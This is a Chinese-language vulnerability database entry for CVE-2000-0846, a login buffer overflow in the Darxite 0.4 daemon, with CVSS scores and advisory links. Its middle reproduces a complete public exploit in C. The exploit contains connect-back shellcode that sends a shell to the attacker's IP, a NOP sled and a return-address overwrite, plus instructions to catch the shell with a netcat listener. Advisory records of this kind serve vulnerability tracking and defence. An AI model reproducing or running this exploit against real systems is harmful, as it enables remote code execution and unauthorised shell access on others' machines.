CVE-2000-0846
CVSS7.5
发布时间 :2000-11-14 00:00:00
修订时间 :2008-09-05 16:22:01
NMCOE    

[原文]Buffer overflow in Darxite 0.4 and earlier allows a remote attacker to execute arbitrary commands via a long username or password.


[CNNVD]Darxite缓冲区溢出漏洞(CNNVD-200011-012)

        Darxite 0.4及其早期版本存在缓冲区溢出漏洞。远程攻击者借助超长用户名或者密码执行任意命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0846
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0846
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200011-012
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1598
(VENDOR_ADVISORY)  BID  1598
http://archives.neohapsis.com/archives/bugtraq/2000-08/0256.html
(VENDOR_ADVISORY)  BUGTRAQ  20000821 Darxite daemon remote exploit/DoS problem
http://xforce.iss.net/static/5134.php
(UNKNOWN)  XF  darxite-login-bo

- 漏洞信息

Darxite缓冲区溢出漏洞
高危 缓冲区溢出
2000-11-14 00:00:00 2005-05-02 00:00:00
远程  
        Darxite 0.4及其早期版本存在缓冲区溢出漏洞。远程攻击者借助超长用户名或者密码执行任意命令。

- 公告与补丁

        

- 漏洞信息 (20159)

Darxite 0.4 Login Buffer Overflow Vulnerability (EDBID:20159)
linux remote
2000-08-22 Verified
0 Scrippie
N/A [点击下载]
source: http://www.securityfocus.com/bid/1598/info

Darxite 0.4 does not do proper bounds checking on user-supplied data during the login process, relying on sprintf() to deliver the data into a 256 character buffer. Therefore, it is possible for an attacker to supply arbitrary code for execution at the privilege level of the Darxite user.


/*
   Darxite Daemon v0.4 password authentication overflow
   ----------------------------------------------------

   I tried to use some easy functions for string creation, and they seem to
   work pretty quick (no more hours of frustration writing for loops :).

   As always I used my own shellcode, you should do a "nc -l -p 27002" on the
   machine you fill in as "your IP" and execute this - if it works you'll have
   a shell in the netcat session.


   -- Scrippie/ronald@grafix.nl
*/

/* Synnergy.net 2000 (c) */

#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <string.h>

#define DARX_BUF        1024
#define NUM_NOPS        1000

int xconnect(unsigned long, unsigned int);
void readBanner(int socket);
char *strcreat(char *, char *, int);
char *stralign(char *, int);
char *longToChar(unsigned long);

char hellcode[]=
        "\xeb\x7a\x5e\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x8d\x4e"
        "\x1c\xb2\x01\x89\x56\x20\xb2\x06\x89\x56\x24\xb2\x02\x89\x56"
        "\x1c\xcd\x80\x89\x46\x18\x89\x16\x66\xc7\x46\x02\x69\x7a\x89"
        "\x46\x1c\x8d\x06\x89\x46\x20\x80\xc2\x0e\x89\x56\x24\x31\xc0"
        "\x04\x66\x80\xc3\x02\x8d\x4e\x1c\xcd\x80\x31\xc0\x04\x3f\x89"
        "\xc2\x8b\x5e\x18\x31\xc9\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0"
        "\x41\xcd\x80\x31\xc0\x8d\x7e\x0f\x80\xc1\x07\xf3\xaa\x04\x0b"
        "\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x31\xd2\xcd\x80\x31\xc0"
        "\xfe\xc0\xcd\x80\xe8\x81\xff\xff\xff\x41\x41\x42\x42\xBB\xBB"
        "\xBB\xBB\x2f\x62\x69\x6e\x2f\x73\x68";

int main(int argc, char **argv)
{
   int sd;
   unsigned int align=0;
   unsigned long sip, retaddy=0xbffff928;
   char *iploc, *evilstring;

   if(argc < 4) {
      printf("Use as: %s <target IP> <target port> <your ip> [ret addy]
[align]
         \n", argv[0]);
      exit(0);
   }

   if((sip = inet_addr(argv[3])) == -1) {
      perror("inet_addr()");
      exit(-1);
   }

   if(argc > 4) retaddy = strtoul(argv[4], NULL, 16);
   if(argc > 5) align = atoi(argv[5]);

   printf("Using return address: 0x%lx\n", retaddy);
   printf("Using alignment: %d\n", align);

   /* Locate the IP position in the shellcode */
   iploc=(char *)strchr(hellcode, 0xBB);
   memcpy((void *) iploc, (void *) &sip, 4);

   /* Generate the overflow string */

   evilstring = strcreat(NULL, "A", align);
      /* We memory leak 5 bytes here, don't make a service out of this :) */
   evilstring = strcreat(evilstring, longToChar(retaddy), (DARX_BUF+8)>>2);
   evilstring = strcreat(evilstring, "\x90", NUM_NOPS);
   evilstring = strcreat(evilstring, hellcode, 1);

   sd = xconnect(inet_addr(argv[1]), atoi(argv[2]));

   printf("Connected... Now sending overflow...\n");

   send(sd, evilstring, strlen(evilstring)+1, 0);

   free(evilstring);
   return(0);
}

/*
   Returns the socket descriptor to "ip" on "port"
*/

int xconnect(unsigned long ip, unsigned int port)
{
   struct sockaddr_in sa;       /* Sockaddr */
   int sd;                      /* Socket Descriptor */

   if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
      perror("socket()");
      exit(-1);
   }

   memset(&sa, 0x00, sizeof(struct sockaddr_in));
   sa.sin_port=htons(port);
   sa.sin_addr.s_addr=ip;

   if(connect(sd, &sa, sizeof(struct sockaddr_in)) == -1) {
      perror("connect()");
      exit(-1);
   }

   return(sd);
}

/*
   Yummy yummy function for easy string creation
*/

char *strcreat(char *dest, char *pattern, int repeat)
{
   char *ret;
   size_t plen, dlen=0;
   int i;

   if(dest) dlen = strlen(dest);
   plen = strlen(pattern);

   ret = (char *)realloc(dest, dlen+repeat*plen+1);

   for(i=0;i<repeat;i++) {
      strcat(ret, pattern);
   }
   return(ret);
}

/*
   Converts a long to an array containing this long
*/

char *longToChar(unsigned long blaat)
{
   unsigned int i;
   char *ret;

   ret = (char *)malloc(sizeof(long)+1);

   for(i=0;i<sizeof(long);i++) {
      ret[i] = (blaat >> (i<<3)) & 0xff;
   }
   ret[sizeof(long)] = 0x00;

   return(ret);
}

		

- 漏洞信息

1522
Darxite Login Fields Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2000-08-21 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站